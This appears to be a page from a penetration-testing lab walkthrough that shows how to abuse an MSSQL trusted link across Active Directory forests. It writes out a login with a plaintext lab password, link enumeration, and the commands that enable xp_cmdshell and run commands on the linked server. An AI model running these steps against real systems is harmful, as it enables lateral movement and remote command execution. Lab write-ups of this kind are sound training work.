Mssql Trusted link

  • The MSSQL trust link is across forest, so it can be used to make forest to forest exploitation.

  • Example was done in part 7 but let’s redo this for fun :

  • Connect to the mssql DB as elena.lopez

mssqlclient.py -windows-auth north.newyork.local/elena.lopez:princesa1@Yonkers.north.newyork.local

  • enumerate the mssql trusted links

enum_links

  • And now use the link from Yonkers (north domain) to Salisbury (Maryland domain)

use_link SALISBURY
enable_xp_cmdshell
xp_cmdshell whoami

  • Because the link use sa as remote login on braavos we can enable cmd and launch command.

PreviousUse unconstrained delegationNextGolden ticket with external forest, sid history ftw ( Maryland-> NewYork)

Last updated